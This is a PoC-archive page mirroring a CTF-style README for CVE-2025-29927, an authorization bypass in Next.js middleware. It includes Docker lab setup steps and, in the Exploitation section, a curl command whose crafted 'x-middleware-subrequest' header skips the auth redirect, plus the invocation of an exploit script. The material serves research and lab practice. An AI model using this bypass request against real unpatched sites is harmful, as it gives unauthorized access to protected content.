Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-29927 PoC — Authorization Bypass in Next.js Middleware

Source
https://github.com/mhamzakhattak/CVE-2025-29927
Associated Vulnerability
Title:Authorization Bypass in Next.js Middleware (CVE-2025-29927)
Description:Next.js is a React framework for building full-stack web applications. Starting in version 1.11.4 and prior to versions 12.3.5, 13.5.9, 14.2.25, and 15.2.3, it is possible to bypass authorization checks within a Next.js application, if the authorization check occurs in middleware. If patching to a safe version is infeasible, it is recommend that you prevent external user requests which contain the x-middleware-subrequest header from reaching your Next.js application. This vulnerability is fixed in 12.3.5, 13.5.9, 14.2.25, and 15.2.3.
Readme
# CVE-2025-29927 - Next.js Middleware Authorization Bypass (PoC)

This is a **Capture The Flag (CTF)** styled Proof of Concept for the **Next.js Middleware Authorization Bypass** vulnerability (**CVE-2025-29927**). The goal is to bypass the auth middleware and retrieve the flag from the `/protected` route.

---

## Vulnerability Summary

- **CVE**: CVE-2025-29927  
- **Type**: Authorization Bypass  
- **Component**: Next.js Middleware  
- **Impact**: Unauthorized access to protected routes  
- **PoC Target Route**: `/protected`  
- **Expected Behavior**: Unauthorized users are redirected to `/`  
- **Vulnerable Behavior**: Using a crafted request allows bypassing the redirect and accessing the protected content directly

---

## PoC Setup

### 1. Clone the Repository

```bash
git clone https://github.com/mhamzakhattak/CVE-2025-29927
cd CVE-2025-29927
cd nextjs-docker
```
---
### 2. Build and Run the Vulnerable App

```bash
sudo docker build -t nextjs-auth-app .
sudo docker run -p 3000:3000 nextjs-auth-app
```

This will start the vulnerable Next.js app on **http://IP:3000**

---

## Exploitation

### 1. Without Exploit

Try accessing:

```bash
curl -i http://IP:3000/protected
```

You will be redirected to `/`.

```bash
 curl -H "x-middleware-subrequest: middleware" http://IP:3000/protected
```

### 2. With Exploit

Use the provided `exploit.py` to bypass the middleware and access the protected route:

```bash
python3 exploit.py -url http://IP:3000
```

If successful, you will retrieve the flag from `/protected`.

---

##  Files

- `Dockerfile` - Builds the vulnerable Next.js application
- `exploit.py` - Exploits the vulnerability to bypass auth
- `pages/` - Contains the vulnerable `/protected` and `/login` routes
- `middleware.js` - The vulnerable middleware logic
- `README.md` - This file

---

## Disclaimer

This PoC is for **educational and research purposes only**. Do not use it against systems you do not own or have explicit permission to test.

---

## 🏁 Flag

Find the flag by exploiting the vulnerability and accessing:

```
http://IP:3000/protected
```

Good luck! 🏴‍☠️
File Snapshot

 [4.0K]  /data/pocs/5fc47cddf1f9b5abd276fd539b4ebaed792eb653
├── [1.9K]  exploit.py
├── [4.0K]  nextjs-docker
│   ├── [ 404]  Dockerfile
│   ├── [ 417]  middleware.js
│   ├── [ 271]  package.json
│   └── [4.0K]  pages
│       ├── [4.0K]  api
│       │   └── [ 478]  login.js
│       ├── [ 667]  index.js
│       ├── [1.8K]  login.js
│       └── [ 530]  protected.js
└── [2.1K]  README.md

3 directories, 9 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →